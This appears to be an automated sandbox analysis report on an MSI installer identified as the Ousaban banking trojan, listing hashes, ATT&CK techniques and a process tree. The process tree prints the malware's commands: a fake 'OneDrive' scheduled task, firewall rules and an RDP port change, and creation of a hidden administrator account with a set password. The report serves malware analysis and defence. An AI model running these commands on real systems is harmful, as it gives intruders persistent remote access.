57675d518613f20edc235c2975eadba7aa15d19aa460df03b443c99cff0d26d1

Analysis

max time kernel
149s
max time network
149s
platform
windows10_x64
resource
win10-en-20211208
submitted
23-12-2021 10:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

seucartao0021 0iictl3q h6ozq5.msi
Size

4.0MB
MD5

04573ca4c50c5c352ec0859d6a14953a
SHA1

1a6780e61a658511f141fa8305ed9a9f318f5518
SHA256

57675d518613f20edc235c2975eadba7aa15d19aa460df03b443c99cff0d26d1
SHA512

d2ac8b26969f25b9c4da413a54118bcfc181dd2bffdabc771119fb5837825d560807862ea4a75f0985b0e2c261d9678fc18a4975bb8c24399e5e248362d9664d

Score

10^/10

evasion persistence suricata

Malware Config

Signatures

suricata: ET MALWARE Ousaban Banker Checkin M1
suricata: ET MALWARE Ousaban Banker Checkin M1
suricata
suricata: ET MALWARE Ousaban Banker Checkin M2
suricata: ET MALWARE Ousaban Banker Checkin M2
suricata
suricata: ET MALWARE Ousaban Banker KeepAlive
suricata: ET MALWARE Ousaban Banker KeepAlive
suricata
suricata: ET MALWARE Ousaban Banker KeepAlive Response
suricata: ET MALWARE Ousaban Banker KeepAlive Response
suricata
suricata: ET MALWARE Ousaban Banker Server Response M1
suricata: ET MALWARE Ousaban Banker Server Response M1
suricata
suricata: ET MALWARE Ousaban Banker Server Response M2
suricata: ET MALWARE Ousaban Banker Server Response M2
suricata

Blocklisted process makes network request 2 IoCs

flow	pid	Process
13	1120	MsiExec.exe
18	1120	MsiExec.exe

Executes dropped EXE 2 IoCs

pid	Process
2076	XvsLOegwgAvH.exe
1920	TLJTRGxbd.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XIEAiogabmYY.lnk	MsiExec.exe

Loads dropped DLL 23 IoCs

pid	Process
1120	MsiExec.exe
1120	MsiExec.exe
1120	MsiExec.exe
1120	MsiExec.exe
2076	XvsLOegwgAvH.exe
2076	XvsLOegwgAvH.exe
2076	XvsLOegwgAvH.exe
2076	XvsLOegwgAvH.exe
2076	XvsLOegwgAvH.exe
2076	XvsLOegwgAvH.exe
2076	XvsLOegwgAvH.exe
2076	XvsLOegwgAvH.exe
2076	XvsLOegwgAvH.exe
2076	XvsLOegwgAvH.exe
1920	TLJTRGxbd.exe
1920	TLJTRGxbd.exe
1920	TLJTRGxbd.exe
1920	TLJTRGxbd.exe
1920	TLJTRGxbd.exe
1920	TLJTRGxbd.exe
1920	TLJTRGxbd.exe
3176	svchost.exe
1988	svchost.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe

Modifies WinLogon 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	TLJTRGxbd.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\Terminal Service 23122021\rdpwrap.ini	TLJTRGxbd.exe
File created	C:\Program Files\Terminal Service 23122021\rdpwrap.dll	TLJTRGxbd.exe

Drops file in Windows directory 11 IoCs

description	ioc	Process
File created	C:\Windows\Installer\f75f667.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF742.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFEF3.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFF52.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\f75f667.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\SourceHash{2CF9BC1F-3B08-4ADD-99C9-AD880A202BE0}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI538E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI549A.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1892	schtasks.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe

Runs net.exe

Script User-Agent 3 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	13	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	18	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	24	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
1964	msiexec.exe
1964	msiexec.exe
2076	XvsLOegwgAvH.exe
2076	XvsLOegwgAvH.exe
1988	svchost.exe
1988	svchost.exe
1988	svchost.exe
1988	svchost.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
632	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2620	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2620	msiexec.exe
Token: SeSecurityPrivilege	1964	msiexec.exe
Token: SeCreateTokenPrivilege	2620	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2620	msiexec.exe
Token: SeLockMemoryPrivilege	2620	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2620	msiexec.exe
Token: SeMachineAccountPrivilege	2620	msiexec.exe
Token: SeTcbPrivilege	2620	msiexec.exe
Token: SeSecurityPrivilege	2620	msiexec.exe
Token: SeTakeOwnershipPrivilege	2620	msiexec.exe
Token: SeLoadDriverPrivilege	2620	msiexec.exe
Token: SeSystemProfilePrivilege	2620	msiexec.exe
Token: SeSystemtimePrivilege	2620	msiexec.exe
Token: SeProfSingleProcessPrivilege	2620	msiexec.exe
Token: SeIncBasePriorityPrivilege	2620	msiexec.exe
Token: SeCreatePagefilePrivilege	2620	msiexec.exe
Token: SeCreatePermanentPrivilege	2620	msiexec.exe
Token: SeBackupPrivilege	2620	msiexec.exe
Token: SeRestorePrivilege	2620	msiexec.exe
Token: SeShutdownPrivilege	2620	msiexec.exe
Token: SeDebugPrivilege	2620	msiexec.exe
Token: SeAuditPrivilege	2620	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2620	msiexec.exe
Token: SeChangeNotifyPrivilege	2620	msiexec.exe
Token: SeRemoteShutdownPrivilege	2620	msiexec.exe
Token: SeUndockPrivilege	2620	msiexec.exe
Token: SeSyncAgentPrivilege	2620	msiexec.exe
Token: SeEnableDelegationPrivilege	2620	msiexec.exe
Token: SeManageVolumePrivilege	2620	msiexec.exe
Token: SeImpersonatePrivilege	2620	msiexec.exe
Token: SeCreateGlobalPrivilege	2620	msiexec.exe
Token: SeRestorePrivilege	1964	msiexec.exe
Token: SeTakeOwnershipPrivilege	1964	msiexec.exe
Token: SeRestorePrivilege	1964	msiexec.exe
Token: SeTakeOwnershipPrivilege	1964	msiexec.exe
Token: SeRestorePrivilege	1964	msiexec.exe
Token: SeTakeOwnershipPrivilege	1964	msiexec.exe
Token: SeRestorePrivilege	1964	msiexec.exe
Token: SeTakeOwnershipPrivilege	1964	msiexec.exe
Token: SeIncreaseQuotaPrivilege	376	WMIC.exe
Token: SeSecurityPrivilege	376	WMIC.exe
Token: SeTakeOwnershipPrivilege	376	WMIC.exe
Token: SeLoadDriverPrivilege	376	WMIC.exe
Token: SeSystemProfilePrivilege	376	WMIC.exe
Token: SeSystemtimePrivilege	376	WMIC.exe
Token: SeProfSingleProcessPrivilege	376	WMIC.exe
Token: SeIncBasePriorityPrivilege	376	WMIC.exe
Token: SeCreatePagefilePrivilege	376	WMIC.exe
Token: SeBackupPrivilege	376	WMIC.exe
Token: SeRestorePrivilege	376	WMIC.exe
Token: SeShutdownPrivilege	376	WMIC.exe
Token: SeDebugPrivilege	376	WMIC.exe
Token: SeSystemEnvironmentPrivilege	376	WMIC.exe
Token: SeRemoteShutdownPrivilege	376	WMIC.exe
Token: SeUndockPrivilege	376	WMIC.exe
Token: SeManageVolumePrivilege	376	WMIC.exe
Token: 33	376	WMIC.exe
Token: 34	376	WMIC.exe
Token: 35	376	WMIC.exe
Token: 36	376	WMIC.exe
Token: SeRestorePrivilege	1964	msiexec.exe
Token: SeTakeOwnershipPrivilege	1964	msiexec.exe
Token: SeIncreaseQuotaPrivilege	376	WMIC.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
2620	msiexec.exe
1120	MsiExec.exe
2620	msiexec.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1280	LogonUI.exe

Suspicious use of WriteProcessMemory 31 IoCs

description	pid	Process	procid_target
PID 1964 wrote to memory of 1120	1964	msiexec.exe	70
PID 1964 wrote to memory of 1120	1964	msiexec.exe	70
PID 1964 wrote to memory of 1120	1964	msiexec.exe	70
PID 1120 wrote to memory of 376	1120	MsiExec.exe	72
PID 1120 wrote to memory of 376	1120	MsiExec.exe	72
PID 1120 wrote to memory of 376	1120	MsiExec.exe	72
PID 2076 wrote to memory of 1672	2076	XvsLOegwgAvH.exe	76
PID 2076 wrote to memory of 1672	2076	XvsLOegwgAvH.exe	76
PID 2076 wrote to memory of 1672	2076	XvsLOegwgAvH.exe	76
PID 1672 wrote to memory of 1892	1672	cmd.exe	78
PID 1672 wrote to memory of 1892	1672	cmd.exe	78
PID 1672 wrote to memory of 1892	1672	cmd.exe	78
PID 2076 wrote to memory of 1920	2076	XvsLOegwgAvH.exe	80
PID 2076 wrote to memory of 1920	2076	XvsLOegwgAvH.exe	80
PID 2076 wrote to memory of 1920	2076	XvsLOegwgAvH.exe	80
PID 1920 wrote to memory of 1820	1920	TLJTRGxbd.exe	85
PID 1920 wrote to memory of 1820	1920	TLJTRGxbd.exe	85
PID 1920 wrote to memory of 2212	1920	TLJTRGxbd.exe	87
PID 1920 wrote to memory of 2212	1920	TLJTRGxbd.exe	87
PID 1920 wrote to memory of 1044	1920	TLJTRGxbd.exe	89
PID 1920 wrote to memory of 1044	1920	TLJTRGxbd.exe	89
PID 1044 wrote to memory of 4028	1044	net.exe	91
PID 1044 wrote to memory of 4028	1044	net.exe	91
PID 1920 wrote to memory of 3164	1920	TLJTRGxbd.exe	92
PID 1920 wrote to memory of 3164	1920	TLJTRGxbd.exe	92
PID 3164 wrote to memory of 884	3164	net.exe	94
PID 3164 wrote to memory of 884	3164	net.exe	94
PID 1920 wrote to memory of 1380	1920	TLJTRGxbd.exe	95
PID 1920 wrote to memory of 1380	1920	TLJTRGxbd.exe	95
PID 1920 wrote to memory of 3860	1920	TLJTRGxbd.exe	97
PID 1920 wrote to memory of 3860	1920	TLJTRGxbd.exe	97

C:\Windows\system32\msiexec.exe
msiexec.exe /I "C:\Users\Admin\AppData\Local\Temp\seucartao0021 0iictl3q h6ozq5.msi"
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2620

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1964
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 63C9AB2F4B38CFDA11DBD125E88C318F
  2⤵
  - Blocklisted process makes network request
  - Drops startup file
  - Loads dropped DLL
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:1120
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" process call create 'C:\Users\Admin\ZicJajftTbIk\XvsLOegwgAvH.exe'
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:376

C:\Users\Admin\ZicJajftTbIk\XvsLOegwgAvH.exe
C:\Users\Admin\ZicJajftTbIk\XvsLOegwgAvH.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2076
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C schtasks /CREATE /TN "OneDrive " /TR C:\\Users\Admin\ZicJajftTbIk\XvsLOegwgAvH.exe /SC minute /MO 2 /IT /RU %USERNAME%
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1672
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "OneDrive " /TR C:\\Users\Admin\ZicJajftTbIk\XvsLOegwgAvH.exe /SC minute /MO 2 /IT /RU Admin
    3⤵
    - Creates scheduled task(s)
    PID:1892
- C:\Users\Admin\dSzzT 66G8\TLJTRGxbd.exe
  "C:\Users\Admin\dSzzT 66G8\TLJTRGxbd.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Modifies WinLogon
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  PID:1920
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3456 profile=any action=allow
    3⤵
    PID:1820
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=udp localport=3456 profile=any action=allow
    3⤵
    PID:2212
- - C:\Windows\system32\net.exe
    net user Administrat0r "123mudar" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1044
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user Administrat0r "123mudar" /add
      4⤵
      PID:4028
- - C:\Windows\system32\net.exe
    net localgroup Administradores Administrat0r /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3164
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administradores Administrat0r /add
      4⤵
      PID:884
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3456 profile=any action=allow
    3⤵
    PID:1380
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3456 /f
    3⤵
    PID:3860

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s TermService
1⤵
- Loads dropped DLL
PID:3176

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1988

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3ad5855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:1280

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Winlogon Helper DLL

T1004

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1120-121-0x0000000002850000-0x0000000002851000-memory.dmp

Filesize
4KB

Download
memory/1120-120-0x0000000002850000-0x0000000002851000-memory.dmp

Filesize
4KB

Download
memory/1920-176-0x0000000072701000-0x0000000072705000-memory.dmp

Filesize
16KB

Download
memory/1920-172-0x0000000001030000-0x000000000136E000-memory.dmp

Filesize
3.2MB

Download
memory/1920-180-0x00000000001D0000-0x00000000001F4000-memory.dmp

Filesize
144KB

Download
memory/1920-177-0x00000000001D0000-0x00000000001F4000-memory.dmp

Filesize
144KB

Download
memory/1920-181-0x00000000001D0000-0x00000000001F4000-memory.dmp

Filesize
144KB

Download
memory/1920-182-0x0000000000CE0000-0x0000000000D04000-memory.dmp

Filesize
144KB

Download
memory/1920-178-0x0000000072640000-0x0000000072668000-memory.dmp

Filesize
160KB

Download
memory/1920-186-0x0000000003461000-0x00000000036BD000-memory.dmp

Filesize
2.4MB

Download
memory/1920-175-0x00000000726F0000-0x00000000726FC000-memory.dmp

Filesize
48KB

Download
memory/1920-173-0x0000000072690000-0x00000000726E7000-memory.dmp

Filesize
348KB

Download
memory/1920-179-0x0000000000BC0000-0x0000000000BC4000-memory.dmp

Filesize
16KB

Download
memory/1964-118-0x00000144CAD50000-0x00000144CAD52000-memory.dmp

Filesize
8KB

Download
memory/1964-117-0x00000144CAD50000-0x00000144CAD52000-memory.dmp

Filesize
8KB

Download
memory/2076-155-0x00000000014E0000-0x00000000014E1000-memory.dmp

Filesize
4KB

Download
memory/2076-154-0x00000000033E1000-0x0000000003867000-memory.dmp

Filesize
4.5MB

Download
memory/2620-115-0x000001CB0C430000-0x000001CB0C432000-memory.dmp

Filesize
8KB

Download
memory/2620-116-0x000001CB0C430000-0x000001CB0C432000-memory.dmp

Filesize
8KB

Download